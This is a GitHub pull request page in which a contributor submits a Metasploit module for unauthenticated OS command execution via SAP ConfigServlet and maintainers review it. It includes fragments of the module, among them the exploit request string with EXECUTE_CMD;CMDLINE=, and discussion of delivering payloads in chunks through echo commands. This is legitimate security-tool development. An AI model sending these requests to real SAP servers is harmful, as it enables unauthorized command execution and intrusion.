New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SAP ConfigServlet OS command execution module #1740

Closed
wants to merge 6 commits into
base: master
from

Conversation

Projects
None yet
3 participants
@andrewkabai
Contributor

andrewkabai commented Apr 18, 2013

This module allows execution of operating system commands throug the
SAP ConfigServlet without any authentication.

The vulnerability was discovered by ERPScan's team, it was presented on Hacker Halted 2012 conference:
http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf

SAP ConfigServlet OS Command Execution module
This module allows execution of operating system commands throug the
SAP ConfigServlet without any authentication.
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Since this module isn't an scanner I would recommend to not use the Scanner mixin here.

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Still better, I would recommend to switch to an exploit module :P sorry commented before full module review.

This comment has been minimized.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

I used Scanner mixin because I had to execute OS commands on several machines in the same time and I was able to use RHOSTS for 'services -p 50000 -R' in this way. Could you recommend an other solution? Btw, it is ok to remove the Scanner mixin.

], self.class)
end
def run_host(ip)

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

If the Scanner mixin isn't used it should switch to "def run"

def initialize(info = {})
super(update_info(info,
'Name' => 'SAP ConfigServlet OS Command Execution',

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Since it's allowing OS Command Execution would be nice to switch to an exploit module. Even a CMD arch module would be nice. Is there any difficulty to put it as an exploit? Feel free to provide or ask for feedback :)

This comment has been minimized.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

see my next comment below

register_options(
[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Since there isn't a generic cmd payload for windows, the CMD option could remain on an exploit, allowing for user-specified commands execution when specified. So the module would benefit from payloads, but also from the flexibility to let the user to specify arbitrary commands :)

This comment has been minimized.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

Basically I agree with your opinion, but as the target could run on linux and windows machines as well and because the vulnerability is simple OS command execution the solution could be complex. The payload must be splited to several parts (because of the GET request length limitation), the parts must be concatenated through OS command execution (echo 'xxx' >> targetfile) and after that it must be executed and of course the path to the temporary file and the execution method also depends on the target OS. So it is possible but not as easy as just execute one simple OS command. I will try and create an exploit module for your needs but I'm not sure if I will have enough time and access to the vulnerable environment to perform tests. I suggest to leave this module as a simple one OS command execution aux module now and I will try to create a new exploit module later. What do you think?

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

I would say, go ahead and try the exploit module :) We love exploit modules over CMD exec aux modules when possible.

There are other ARCH_CMD exploits which use the URL to deliver the payload so it should work (maybe there are extra limitations because of the SAP environment I'm not aware of). For example, check awstats_configdir_exec.rb.

On the other hand, it can be more difficult than the auxiliary module, that's true. If you would like, I could provide help and/or feedback if necessary while development the exploit. I guess it's exploiting NetWeaver J2EE platform, am I right? If it's the case, do you know if there is any free demo or trial publicly available I could use to test that?

Anyway if there are other difficulties which make the exploit really hard or not feasible, the cmd aux module can be accepted for sure.

This comment has been minimized.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

I don't know about any publicly available demo. My opinion is the following: because the aux module with simple OS command execution is OS independent I would like to correct this module based on your notes and submit that in this way as it is (it will be ready in one day).
On the other hand during the following days I will create an exploit module that will be able to execute payloads but only for windows, because in my environment I have only windows targets and I can perform tests only on them.

This comment has been minimized.

@wchen-r7

wchen-r7 Apr 19, 2013

Contributor

It's ok if you only have Windows for testing.

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

It it's right for @wchen-r7, its right for me :)

[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Please use the TARGETURI datastore option which is used by the Msf::Exploit::Remote::HttpClient mixin.

print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Please use normalize_uri to build the url_path. And also use "get_params" to specify the GET params to send_request_cgi. Feel free to check:

https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient

Which is a nice reference about hot to use the HttpClient mixin.

Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
OptBool.new('SSL', [true, 'Use SSL', false])

This comment has been minimized.

@wchen-r7

wchen-r7 Apr 19, 2013

Contributor

Is this needed? Thought default as false.

andrewkabai added some commits Apr 19, 2013

remove Scanner mixin
remove Scanner mixin because this module is not a scanner modul
improve URI path and parameter handling
switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to to prepare query string (instead of
vars_get that escapes the necessary semicolons)
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

The Rank field isn't needed on auxiliary modules

{
'uri' => uri,
'method' => 'GET',
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])

This comment has been minimized.

This comment has been minimized.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

is there any way to forbid send_request_cgi to escape special characters from vars_get? in this case if I put the current query string to vars_get then the necessary semicolons will be encoded and that is bad for me.

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Apr 19, 2013

It's not msftidy compliant at this moment, msftidy warnings should be fixed:

$ tools/msftidy.rb modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb 
sap_configservlet_exec_noauth.rb:39 - [WARNING] Spaces at EOL
'Andras Kabai' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Is there any CVE, OSVDB and/or BID reference for this vulnerability? just asking :) If there is would be nice to add it.

This comment has been minimized.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

as far as I know there is no more reference to this vulnerability yet.

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Apr 19, 2013

Hi @andrewkabai , do you mind to share a pcap of the module working for verification? Since I dont find any free trial / edition of SAP java I guess it would be the easiest way to verify it and be able to proceed with merging :) Feel free to use email if would be better for you: juan.vazquez [at] metasploit.com

@andrewkabai

This comment has been minimized.

Contributor

andrewkabai commented Apr 19, 2013

hi @jvazquez-r7 , sure, I don't mind, but I can access to the vulnerable environment on Monday. I will send the pcap via email.

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Apr 19, 2013

Sounds good! thanks very much!

@andrewkabai

This comment has been minimized.

Contributor

andrewkabai commented Apr 22, 2013

I sent the validation pcap via email!

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Apr 22, 2013

Hi @andrewkabai

pcap verified and looks fine!, module is mainly ready to be merged! Thanks very much for your collaboration!

But I've just noticed you're using your mater branch to do the pull request. I'm going to need to ask you to do a new pull request, using a new branch on your repo, to avoid problems when merging into the rapid7 repository.

In order to do it fine just create new branch from your master branch. For example:

git checkout master
git checkout -b sap_portal_configservlet

Write the new module and then add the new module, in the new branch, to your local repository and push into your origin:

git add modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
git commit -m "Add module for SAP Portal cmd exec"
git push origin sap_portal_configservlet

Then proceed to do the pull request against the rapid7 repository, but using the new branch. I've just tried to provide sample commands. You can carefully review how to proceed with pull requests from the documentation available at the wiki: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment

Please dont hesitate on contact me if you've any doubt. In the meanwhile I'm going to close this pull request because it can not be merged.

Thanks very much!

juan

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment